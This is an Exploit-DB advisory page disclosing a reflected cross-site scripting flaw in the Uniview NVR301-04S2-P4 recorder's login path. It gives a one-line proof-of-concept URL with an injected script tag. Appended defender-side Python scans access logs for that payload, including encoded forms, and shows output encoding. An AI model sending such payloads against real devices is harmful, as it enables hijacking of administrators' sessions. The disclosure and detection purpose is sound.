Uniview NVR301-04S2-P4 – Reflected Cross-Site Scripting (XSS)

  • Author: Bleron Rrustemi
    Date: 2023-03-29
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51130/
  • # Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)
    # Author: Bleron Rrustemi
    # Discovery Date: 2022-11-15
    # Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/
    # Datasheet: https://www.uniview.com/download.do?id=1761643
    # Device Firmware: NVR-B3801.20.15.200829
    # Tested Version: NVR301-04S2-P4
    # Tested on: Windows 10 Enterprise LTSC 64\Firefox 106.0.5 (64-bit)
    # Vulnerability Type: Reflected Cross-Site Scripting (XSS)
    # CVE: N/A
    
    # Proof of Concept:
    
    IP=IP of the device
    
    http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('1')</script>
    
     
    
    Best regards,
    
    Bleron Rrustemi
    Chief Technology Officer
    Drugëza SHPK
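
Added example (not part of the original advisory and not vendor code): a defender-side check that scans web access logs for requests to the login endpoint named above whose path carries HTML markup after percent-decoding, together with the HTML-encoding a response must apply before echoing such a path. The combined-log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import unquote

# Endpoint named in the advisory; anything after it is attacker-controlled path data.
LOGIN_PREFIX = "/LAPI/V1.0/System/Security/Login"
# Characters that let a reflected value break out of an attribute or open a tag.
MARKUP = re.compile(r'[<>"\']')
# Assumed log format: common/combined access log ("METHOD target HTTP/x.y").
REQUEST = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded markup (%253C) is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_suffix(target):
    """Return the decoded text after the login endpoint if it carries markup, else None."""
    path = decode_fully(target)
    if not path.lower().startswith(LOGIN_PREFIX.lower()):
        return None
    suffix = path[len(LOGIN_PREFIX):]
    return suffix if MARKUP.search(suffix) else None

def scan(lines):
    """Return (client, suffix) pairs for log lines that hit the endpoint with markup."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if m and (suffix := suspicious_suffix(m.group(1))) is not None:
            hits.append((line.split()[0], suffix))
    return hits

def reflect_safely(suffix):
    """Encode a path fragment before echoing it into HTML (quotes included)."""
    return html.escape(suffix, quote=True)

# Constructed sample log lines (not captured from a real device).
SAMPLE = [
    '192.0.2.10 - - [15/Nov/2022:10:00:00 +0000] "POST /LAPI/V1.0/System/Security/Login HTTP/1.1" 200 512',
    '192.0.2.44 - - [15/Nov/2022:10:02:13 +0000] "GET /LAPI/V1.0/System/Security/Login/%22%3E%3Cscript%3Ealert(%271%27)%3C/script%3E HTTP/1.1" 200 733',
    '192.0.2.45 - - [15/Nov/2022:10:03:40 +0000] "GET /LAPI/V1.0/System/Security/Login/%2522%253Esvg HTTP/1.1" 200 733',
]
```

`scan(SAMPLE)` flags the second and third lines only; the third shows why a single decoding pass is not enough when matching on logged request targets.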